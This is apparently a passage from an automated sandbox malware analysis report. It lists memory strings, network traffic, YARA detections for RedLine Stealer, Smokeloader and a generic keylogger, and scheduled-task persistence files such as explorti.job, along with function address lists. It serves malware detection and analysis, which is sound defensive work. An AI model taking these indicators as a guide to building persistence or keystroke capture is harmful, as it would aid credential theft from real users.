Source: firefox.exe, 00000018.00000002.2626428785.00000238E8F6F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/accountMOZ_CRASHREPORT
Source: firefox.exe, 00000023.00000002.3324817796.0000028631391000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.2942352042.00000286233A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/accountMOZ_CRASHREPORTER_STRINGS_OVERRIDE=C:
Source: 1c593ec106.exe, 0000000C.00000002.2961150668.00000000066D2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/accountQ
Source: firefox.exe, 0000001D.00000002.2643663526.000001F414100000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/account_
Source: firefox.exe, 00000018.00000002.2631652987.00000238F387B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/accountbrowser-delayed-startup-finishedauthorStyleDisabledDefaultresetLocati
Source: firefox.exe, 00000023.00000002.3338983377.000002863207E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/accountmain/nimbus-desktop-experimentsmain/nimbus-desktop-experimentsupgrade
Source: 1c593ec106.exe, 0000000C.00000002.2961150668.00000000066D2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/accountt
Source: firefox.exe, 00000018.00000002.2631652987.00000238F387B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/accounttoolkit.singletonWindowType_downloadTypesViewableInternally_shouldVie
Source: 1c593ec106.exe, 00000009.00000002.2964260464.0000000006630000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/accountw
Source: firefox.exe, 00000018.00000002.2630851621.00000238F3709000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2630851621.00000238F372C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2598025146.00000238F3712000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3321697398.00000286310AB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3025589583.000002862D495000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://xhr.spec.whatwg.org/#sync-warning
Source: firefox.exe, 00000023.00000002.3357057608.0000028632C41000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3297087442.000002862E582000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://youtube.com

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49568
Source: unknown	Network traffic detected: HTTP traffic on port 49567 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49567
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49554
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49565
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49553
Source: unknown	Network traffic detected: HTTP traffic on port 49563 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49564
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49563
Source: unknown	Network traffic detected: HTTP traffic on port 49568 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49562 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49562
Source: unknown	Network traffic detected: HTTP traffic on port 49565 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49550
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49561
Source: unknown	Network traffic detected: HTTP traffic on port 49564 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49561 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49554 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49553 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49558 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49550 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49558

Source: unknown	HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.4:49564 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:49565 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.4:49568 version: TLS 1.2

Installs a raw input device (often for capturing keystrokes)

Source: 1c593ec106.exe, 00000009.00000002.2939170613.00000000021CA000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: _WINAPI_REGISTERRAWINPUTDEVICES

memstr_ce4959c1-9

Yara detected Keylogger Generic

Source: Yara match	File source: Process Memory Space: 1c593ec106.exe PID: 8168, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1c593ec106.exe PID: 6824, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1c593ec106.exe PID: 3960, type: MEMORYSTR

System Summary

Malicious sample detected (through community Yara rule)

Source: 0000000A.00000002.2721807225.00000000025D0000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000008.00000002.2743508597.0000000003FB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 0000001E.00000002.2781993331.00000000026C0000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000001E.00000002.2783023147.00000000040C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000008.00000002.2741099564.00000000024AD000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000000A.00000002.2722138020.00000000040D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown

Binary is likely a compiled AutoIt script file

Source: 1c593ec106.exe, 00000009.00000002.2918001289.0000000000452000.00000040.00000001.01000000.0000000A.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_9374cf64-b
Source: 1c593ec106.exe, 00000009.00000002.2918001289.0000000000452000.00000040.00000001.01000000.0000000A.sdmp	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_0f8a039e-2
Source: 1c593ec106.exe, 0000000C.00000002.2917186375.0000000000452000.00000040.00000001.01000000.0000000A.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_267b08d5-7
Source: 1c593ec106.exe, 0000000C.00000002.2917186375.0000000000452000.00000040.00000001.01000000.0000000A.sdmp	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_c9dee059-b
Source: 1c593ec106.exe, 0000001F.00000002.2919090874.0000000000452000.00000040.00000001.01000000.0000000A.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_3021083a-f
Source: 1c593ec106.exe, 0000001F.00000002.2919090874.0000000000452000.00000040.00000001.01000000.0000000A.sdmp	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_7e0d4c10-0

PE file contains section with special chars

Source: 8NjcvPNvUr.exe	Static PE information: section name:
Source: 8NjcvPNvUr.exe	Static PE information: section name: .idata
Source: 8NjcvPNvUr.exe	Static PE information: section name:
Source: explorti.exe.0.dr	Static PE information: section name:
Source: explorti.exe.0.dr	Static PE information: section name: .idata
Source: explorti.exe.0.dr	Static PE information: section name:
Source: random[1].exe.8.dr	Static PE information: section name:
Source: random[1].exe.8.dr	Static PE information: section name: .idata
Source: random[1].exe.8.dr	Static PE information: section name:
Source: RoamingHJDBKJKFIE.exe.8.dr	Static PE information: section name:
Source: RoamingHJDBKJKFIE.exe.8.dr	Static PE information: section name: .idata
Source: RoamingHJDBKJKFIE.exe.8.dr	Static PE information: section name:
Source: userKFHCAEGCBF.exe.8.dr	Static PE information: section name:
Source: userKFHCAEGCBF.exe.8.dr	Static PE information: section name: .idata
Source: userKFHCAEGCBF.exe.8.dr	Static PE information: section name:
Source: random[1].exe0.8.dr	Static PE information: section name:
Source: random[1].exe0.8.dr	Static PE information: section name: .idata
Source: random[1].exe0.8.dr	Static PE information: section name:
Source: axplong.exe.18.dr	Static PE information: section name:
Source: axplong.exe.18.dr	Static PE information: section name: .idata
Source: axplong.exe.18.dr	Static PE information: section name:

PE file has nameless sections

Source: random[1].exe0.7.dr	Static PE information: section name:
Source: random[1].exe0.7.dr	Static PE information: section name:
Source: random[1].exe0.7.dr	Static PE information: section name:
Source: random[1].exe0.7.dr	Static PE information: section name:
Source: random[1].exe0.7.dr	Static PE information: section name:
Source: random[1].exe0.7.dr	Static PE information: section name:
Source: 1c593ec106.exe.7.dr	Static PE information: section name:
Source: 1c593ec106.exe.7.dr	Static PE information: section name:
Source: 1c593ec106.exe.7.dr	Static PE information: section name:
Source: 1c593ec106.exe.7.dr	Static PE information: section name:
Source: 1c593ec106.exe.7.dr	Static PE information: section name:
Source: 1c593ec106.exe.7.dr	Static PE information: section name:

Contains functionality to call native functions

Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C22B700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	8_2_6C22B700
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C22B8C0 rand_s,NtQueryVirtualMemory,	8_2_6C22B8C0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C22B910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError,	8_2_6C22B910
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C1CF280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	8_2_6C1CF280

Creates files inside the system directory

Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	File created: C:\Windows\Tasks\explorti.job			Jump to behavior
Source: C:\Users\userKFHCAEGCBF.exe	File created: C:\Windows\Tasks\axplong.job

Detected potential crypto function

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 7_2_00353068	7_2_00353068
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 7_2_00314CF0	7_2_00314CF0
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 7_2_00347D83	7_2_00347D83
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 7_2_0035765B	7_2_0035765B
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 7_2_00314AF0	7_2_00314AF0
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 7_2_00358720	7_2_00358720
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 7_2_00356F09	7_2_00356F09
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 7_2_0035777B	7_2_0035777B
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 7_2_00352BD0	7_2_00352BD0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C1C35A0	8_2_6C1C35A0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C23542B	8_2_6C23542B
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C23AC00	8_2_6C23AC00
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C205C10	8_2_6C205C10
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C212C10	8_2_6C212C10
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C1D5440	8_2_6C1D5440
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C23545C	8_2_6C23545C
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C2234A0	8_2_6C2234A0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C22C4A0	8_2_6C22C4A0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C1D6C80	8_2_6C1D6C80
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C1ED4D0	8_2_6C1ED4D0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C206CF0	8_2_6C206CF0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C1D64C0	8_2_6C1D64C0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C1CD4E0	8_2_6C1CD4E0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C1F0512	8_2_6C1F0512
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C1EED10	8_2_6C1EED10
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C1DFD00	8_2_6C1DFD00
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C2285F0	8_2_6C2285F0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C200DD0	8_2_6C200DD0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C229E30	8_2_6C229E30
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C215600	8_2_6C215600
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C207E10	8_2_6C207E10
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C236E63	8_2_6C236E63
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C1E9E50	8_2_6C1E9E50
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C1E4640	8_2_6C1E4640
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C1CC670	8_2_6C1CC670
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C212E4E	8_2_6C212E4E
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C203E50	8_2_6C203E50
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C224EA0	8_2_6C224EA0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C1E5E90	8_2_6C1E5E90
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C22E680	8_2_6C22E680
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C2376E3	8_2_6C2376E3
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C1CBEF0	8_2_6C1CBEF0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C1DFEF0	8_2_6C1DFEF0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C1D9F00	8_2_6C1D9F00
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C207710	8_2_6C207710
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C2177A0	8_2_6C2177A0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C1F6FF0	8_2_6C1F6FF0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C1CDFE0	8_2_6C1CDFE0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C20B820	8_2_6C20B820
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C214820	8_2_6C214820
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C1D7810	8_2_6C1D7810
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C1E8850	8_2_6C1E8850
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C1ED850	8_2_6C1ED850
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C20F070	8_2_6C20F070
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C1F60A0	8_2_6C1F60A0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C2058E0	8_2_6C2058E0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C2350C7	8_2_6C2350C7
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C1EC0E0	8_2_6C1EC0E0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C21B970	8_2_6C21B970
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C23B170	8_2_6C23B170
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C1EA940	8_2_6C1EA940
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C1DD960	8_2_6C1DD960
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C1FD9B0	8_2_6C1FD9B0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C205190	8_2_6C205190
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C222990	8_2_6C222990
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C1CC9A0	8_2_6C1CC9A0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C209A60	8_2_6C209A60
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C232AB0	8_2_6C232AB0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C1DCAB0	8_2_6C1DCAB0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C23BA90	8_2_6C23BA90
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C1C22A0	8_2_6C1C22A0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C1F4AA0	8_2_6C1F4AA0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C20E2F0	8_2_6C20E2F0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C208AC0	8_2_6C208AC0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C1E1AF0	8_2_6C1E1AF0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C20D320	8_2_6C20D320
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C1C5340	8_2_6C1C5340
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C1DC370	8_2_6C1DC370
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C1CF380	8_2_6C1CF380
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C2353C8	8_2_6C2353C8
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C34AC30	8_2_6C34AC30
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C336C00	8_2_6C336C00
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C27AC60	8_2_6C27AC60
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C26ECC0	8_2_6C26ECC0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C2CECD0	8_2_6C2CECD0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C3F8D20	8_2_6C3F8D20
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C33ED70	8_2_6C33ED70
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C39AD50	8_2_6C39AD50
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C274DB0	8_2_6C274DB0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C306D90	8_2_6C306D90
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C3FCDC0	8_2_6C3FCDC0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C350E20	8_2_6C350E20
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C30EE70	8_2_6C30EE70
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C2F6E90	8_2_6C2F6E90
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C27AEC0	8_2_6C27AEC0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C310EC0	8_2_6C310EC0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C3B0F20	8_2_6C3B0F20
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C276F10	8_2_6C276F10
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C332F70	8_2_6C332F70
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C2DEF40	8_2_6C2DEF40
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C3B8FB0	8_2_6C3B8FB0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C27EFB0	8_2_6C27EFB0
